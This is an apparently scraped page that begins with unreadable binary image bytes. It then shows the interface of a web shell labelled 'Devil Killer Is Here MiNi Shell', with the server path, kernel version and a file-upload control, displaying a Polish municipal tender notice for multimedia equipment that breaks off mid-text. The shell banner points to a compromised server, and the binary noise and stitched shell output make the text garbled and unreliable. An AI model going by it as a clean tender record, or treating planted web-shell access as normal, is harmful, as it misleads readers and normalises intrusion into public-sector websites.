JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211110/0026513201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu multimedialnego wraz z jego montażem i konfiguracją systemów w pomieszczeniach budynku biurowego z przeznaczeniem na cele społeczne </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOŚCIELISKO</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Referat Inwestycji, Zamówień Publicznych, Utrzymania Dróg i Gospodarki Komunalnej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892305</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Nędzy Kubińca 101</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kościelisko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-511</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">182023400</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@gminakoscielisko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminakoscielisko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu multimedialnego wraz z jego montażem i konfiguracją systemów w pomieszczeniach budynku biurowego z przeznaczeniem na cele społeczne </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-01106830-421d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00265132</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003236/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa sprzętu multimedialnego wraz z montażem i konfiguracją w budynku biurowym -Centrum Aktywnej Integracji i Interwencji Kryzysowej, siedziby GOPS i UG</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przebudowa i adaptacja istniejącego budynku biurowego z przeznaczeniem na cele społ.Centr.AktywnejIntegr.Interw.Kryzysowej, siedziby GOPS, UG Kościelisko) wraz z zagospodarowaniem terenu wokół budynku” - projekt współfinansowany z Regionalnego Programu Operacyjnego Województwa Małopolskiego na lata 2014-2020 oś 11 Rewitalizacja przestrzeni regionalnej; działanie 11.2- Odnowa obszarów wiejskich </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2.	Składanie ofert i wszelkich dokumentów lub oświadczeń składanych wraz z ofertą dopuszcza się jedynie przy użyciu środków komunikacji elektronicznej, przy użyciu systemu „miniPortal” (https://miniportal.uzp.gov.pl) oraz dedykowanego formularza dostępnego na ePUAP (https://epuap.gov.pl/wps/portal).<br/>Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/> <br/><br/>3.	Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1)	drogą elektroniczną przetargi@gminakoscielisko.pl<br/>2)	poprzez system, dostępną pod adresem: https://miniportal.uzp.gov.pl/<br/>4.	Korzystanie z „miniPortalu” jest jednoznaczne z akceptacją Regulaminu korzystania z systemu<br/>„miniPortal” oraz Warunków korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5.	Wykonawca, zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>6.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu „miniPortal” oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>7.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>8.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby, sporządza się w postaci elektronicznej w formatach danych ogólnodostępnych w szczególności np. doc, .docx, .rtf, .xps, .odt,<br/>.pdf, .gif, .jpg, .jpeg, .ods, .png, .svg, .tif, .txt, .xls, .xlsx, .xml; (pliki kompresować należy do formatu .:<br/>.zip, .tar, .gz, .gzip, .7z) pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej , tj. podpisana kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym.<br/>9.	Sposób złożenia oferty wraz z załącznikami, w tym zaszyfrowania oferty, sposób wycofania oferty, opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/.<br/>10.	Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również w systemie „miniPortal”.<br/>11.	Osobą uprawnioną przez Zamawiającego do porozumiewania się z Wykonawcami jest w zakresie proceduralnym oraz w zakresie merytorycznym:<br/>Beata Fidermak, tel. 182023400<br/>Małgorzata Jasionek, tel. 182023400<br/>12.	W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania – ZP.271.23.2021.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.23.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są dostawy sprzętu multimedialnego wraz z jego montażem i konfiguracją celem stworzenia systemów: prezentacji obrazów, rejestracji spotkań, konferencyjno- dyskusyjnego , videokonferencji, nagłośnienia, sterowania i rezerwowego zasilania w pomieszczeniach budynku biurowego z przeznaczeniem na cele społeczne (Centrum Aktywnej Integracji i Interwencji Kryzysowej, siedziby Gminnego Ośrodka Pomocy społecznej, siedziby Urzędu Gminy Kościelisko) wraz z wykonaniem pomiarów, prób, dokumentacji powykonawczej oraz szkoleniem osób wyznaczonych przez Zamawiającego z obsługi systemów.<br/><br/>1.1.	Zamówienie składa się z części gwarantowanej zamówienia oraz objętej prawem opcji.<br/>1.1.1.	gwarantowaną części zamówienia, która swoim zakresem obejmuje wykonanie:<br/>1.1.1.1.	sala konferencyjna/ Centrum Aktywnej Integracji piętro II pokój 201<br/>1.1.1.1.1.	system prezentacji obrazów<br/>•	projektor multimedialny szt. 2<br/>•	uchwyt montażowy projektora szt. 1<br/>•	półka ścienna do projektora szt. 1<br/>•	ekran elektryczny szt. 2<br/>•	konstrukcja montażowa ekranu szt. 2<br/>•	mikrofon typu &#34;gęsia szyja&#34;- dostawa i montaż w mównicy kpl. 1<br/>•	przyłącze podłogowe- wyposażenie<br/>doposażenie okablowania w AV i multimedia szt. 2<br/>•	extender HDMI/HDBaseT szt. 2<br/>•	procesor sygnałowy i sterujący szt. 1<br/>•	odbiornik HDBaseT ze skalerem szt. 2<br/>1.1.1.1.2.	system rejestracji spotkań (zamawiający posiada kamerę PTZ, uchwyt, aplikację kontrolną do kamery, który należy wykorzystać w realizacji systemu)<br/>•	monitor poglądowy LCD15” dla obrazu z kamery PTZ szt. 1<br/>•	rejestrator obrazu z funkcją streamingu szt. 1<br/>•	rozdzielacz HDMI szt. 1<br/>1.1.1.1.3.	system konferencyjny- dyskusyjny przewodowy bez funkcji indywidualnego przydzielania głosu<br/>•	panel mikrofonowo-głośnikowy przewodniczącego szt. 1<br/>•	panel mikrofonowo-głośnikowy uczestnika szt. 10<br/>•	jednostka centralna szt. 1<br/>•	mikrofon z podświetleniem o dł. ok. 35 cm szt. 11<br/>1.1.1.1.4.	system videokonferencji<br/>•	przyłącze wideokonferencyjne dla komputera z kontem MS Teams/ZOOM szt. 1<br/>1.1.1.1.5.	system nagłośnienia<br/>•	zestaw mikrofonu bezprzewodowego „do ręki” szt. 1<br/>•	mikrofon typu gęsia szyja z podstawką szt. 1<br/>•	cyfrowy procesor audio z eliminacją echa szt. 1<br/>•	wzmacniacz audio szt. 2<br/>•	głośnik ścienny dla większej części Sali szt. 4<br/>•	głośnik ścienny dla mniejszej części Sali szt. 2<br/>•	szafa wisząca rack 19” z wyposażaniem szt. 1<br/>1.1.1.1.6.	system sterowania<br/>•	panel sterujący dotykowy 7&#34; dla prowadzącego szt. 1<br/>•	klawiatura przy drzwiach wejściowych szt. 2<br/>•	interfejs sterujący szt. 1<br/> <br/>•	rozdzielnia RE-AV z wyposażeniem szt. 1<br/>•	moduł przekaźnikowy szt. 2<br/>•	moduł sterowania oświetleniem DALI szt. 1<br/>•	switch LAN PoE szt. 1<br/>1.1.1.1.7.	Prace i usługi instalacyjne<br/>•	okablowanie- doposażenie<br/>w patchcord’y, wtyki i złącza, kable ruchome kpl. 1<br/>•	montaż urządzeń szt. 1<br/>•	oprogramowanie szt. 1<br/>•	integracja systemu szt. 1<br/>•	dokumentacja powykonawcza szt. 1<br/><br/>1.1.1.2.	sala konferencyjna/ Centrum Aktywnej Integracji piętro II pokój 202 system prezentacji obrazów<br/>•	telewizor smart LCD 75” szt. 1<br/>•	uchwyt ścienny TV szt. 1<br/>•	przyłącze podłogowe- wyposażenie szt. 1<br/>•	extender szt. 1<br/>•	okablowanie szt. 1<br/>•	montaż i uruchomienie urządzeń szt. 1<br/>1.1.1.3.	sala konferencyjna/ Centrum Aktywnej Integracji piętro I pokój 103 (zamawiający dostarczy komputer z aplikacją MS Teams/ZOOM)<br/>system prezentacji obrazów<br/>•	telewizor smart LCD 75” szt. 1<br/>•	uchwyt ścienny TV szt. 1<br/>•	przyłącze podłogowe- wyposażenie szt. 1<br/>•	Extender szt. 1<br/>•	przedłużacz aktywny USB 3.0 optyczny do kamery USB szt. 1<br/>•	okablowanie- doposażenie w patchcord’y, wtyki i złącza, kable ruchome kpl. 1<br/>•	montaż i uruchomienie urządzeń szt. 1<br/>1.1.1.4.	Hall główny- parter system podstawowy<br/>•	doprowadzenie sieci LAN z lokalnego punktu dystrybucji- doposażenie w patchcord’y, wtyki i złącza, kable ruchome szt. 1<br/><br/>1.1.1.2. system zasilania awaryjnego zasilacz UPS 10kW- serwerownia szt. 1<br/><br/><br/>1.1.2.	Części zamówienia objęta prawem opcji, która swoim zakresem przewiduje wykonanie:<br/>1.1.2.1.	sala konferencyjna/ Centrum Aktywnej Integracji piętro II pokój 201<br/>1.2.2.1.1	system prezentacji obrazów<br/>•	system bezprzewodowej prezentacji szt. 1<br/>•	monitor podglądowy 65” szt. 2<br/>•	uchwyt ścienny monitora szt. 2<br/>•	extender szt. 1<br/>•	rozdzielacz HDMI szt. 1<br/>1.2.2.1.2	system konferencyjny- dyskusyjny (uzupełnienie)<br/>•	panel mikrofonowo- głośnikowy uczestnika szt. 10<br/>•	mikrofon z podświetleniem o dł. ok. 35 cm szt. 10<br/>1.2.2.1.3. system nagłośnienia<br/>•	zestaw mikrofonu bezprzewodowego „do ręki” szt. 1<br/>1.2.2.1.4 prace i usługi instalacyjne<br/>•	montaż urządzeń szt. 1<br/> <br/>•	oprogramowanie- rekonfiguracja systemu szt. 1<br/>•	integracja systemu szt. 1<br/><br/>1.2.2.2.	sala konferencyjna/ Centrum Aktywnej Integracji piętro II pokój 202 system prezentacji obrazów<br/>•	system bezprzewodowej prezentacji szt. 1<br/>1.2.2.3.	sala konferencyjna/ Centrum Aktywnej Integracji piętro I pokój 103 system prezentacji obrazów<br/>•	kamera USB do polaczeń wideokonferencyjnych (rozszerzenia komputera) szt. 1<br/>1.2.2.4.	Hall główny- parter system prezentacji obrazów<br/>•	monitor DS. LCD 65” szt. 1<br/>•	uchwyt sufitowy szt. 1<br/>•	player multimedialny szt. 1<br/>•	montaż i uruchomienie urządzeń szt. 1<br/><br/>Szczegółowy opis oraz sposób realizacji zamówienia zawiera Opis Przedmiotu Zamówienia (OPZ), stanowiący Załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32322000-6 - Urządzenia multimedialne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">31682530-4 - Awaryjne urządzenia energetyczne</p> <p class="mb-0">32260000-3 - Urządzenia do przesyłu danych</p> <p class="mb-0">32324600-6 - Telewizory cyfrowe</p> <p class="mb-0">32333100-7 - Rejestratory obrazu wideo</p> <p class="mb-0">32340000-8 - Mikrofony i głośniki</p> <p class="mb-0">32342400-6 - Sprzęt nagłaśniający</p> <p class="mb-0">38652100-1 - Projektory</p> <p class="mb-0">38653400-1 - Ekrany projekcyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.1.2.	Części zamówienia objęta prawem opcji, która swoim zakresem przewiduje wykonanie:<br/>1.1.2.1.	sala konferencyjna/ Centrum Aktywnej Integracji piętro II pokój 201<br/>1.2.2.1.1	system prezentacji obrazów<br/>•	system bezprzewodowej prezentacji szt. 1<br/>•	monitor podglądowy 65” szt. 2<br/>•	uchwyt ścienny monitora szt. 2<br/>•	extender szt. 1<br/>•	rozdzielacz HDMI szt. 1<br/>1.2.2.1.2	system konferencyjny- dyskusyjny (uzupełnienie)<br/>•	panel mikrofonowo- głośnikowy uczestnika szt. 10<br/>•	mikrofon z podświetleniem o dł. ok. 35 cm szt. 10<br/> <br/>1.2.2.1.3. system nagłośnienia<br/>•	zestaw mikrofonu bezprzewodowego „do ręki” szt. 1<br/>1.2.2.1.4 prace i usługi instalacyjne<br/>•	montaż urządzeń szt. 1<br/>•	oprogramowanie- rekonfiguracja systemu szt. 1<br/>•	integracja systemu szt. 1<br/><br/>1.2.2.2.	sala konferencyjna/ Centrum Aktywnej Integracji piętro II pokój 202 system prezentacji obrazów<br/>•	system bezprzewodowej prezentacji szt. 1<br/>1.2.2.3.	sala konferencyjna/ Centrum Aktywnej Integracji piętro I pokój 103 system prezentacji obrazów<br/>•	kamera USB do polaczeń wideokonferencyjnych (rozszerzenia komputera) szt. 1<br/>1.2.2.4.	Hall główny- parter system prezentacji obrazów<br/>•	monitor DS. LCD 65” szt. 1<br/>•	uchwyt sufitowy szt. 1<br/>•	player multimedialny szt. 1<br/>•	montaż i uruchomienie urządzeń szt. 1<br/><br/><br/>1.3.	Warunkiem skorzystania Zamawiającego z prawa opcji będzie zależna od zapotrzebowania oraz posiadania środków finansowych na realizację zamówienia objętego prawem opcji.<br/>1.4.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji w niepełnym zakresie.<br/>1.5.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji wielokrotnie do wyczerpania maksymalnych ilości wskazanych w pkt. 1.1.2 <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zmawiający wybierze tę ofertę spośród ofert nie odrzuconych, która uzyska najwyższą liczbę punktów zgodnie ze wskazanymi powyżej kryteriami. Liczba punktów będzie zaokrąglona do drugiego miejsca po przecinku. Liczbę punktów uzyskanych przez Wykonawcę oblicza się według wzoru:<br/><br/>P= KC + KG + KS<br/>gdzie:<br/>P - liczba punktów uzyskanych przez wykonawcę<br/>KC - liczba punktów uzyskanych za kryterium cena brutto<br/>KG- liczba punktów uzyskanych za kryterium okres udzielonych gwarancji KS - liczba punktów uzyskanych za kryterium serwis systemów/urządzeń</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonych gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Serwis systemów/urządzeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ; zgodnie z załącznikiem nr 2 i 3 do SWZ.<br/>2)	dokumenty, z których wynika umocowanie do reprezentowania Wykonawcy; tj. odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (Wykonawca nie jest zobowiązany do złożenia dokumentu, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów, przy czym poprzez w/w dane należy rozumieć wskazanie przez wykonawcę w oświadczeniu, o którym mowa w rozdziale X ust. 1 np. nr KRS, nr NIP, nr REGON)<br/>3)	ew. odpowiednie 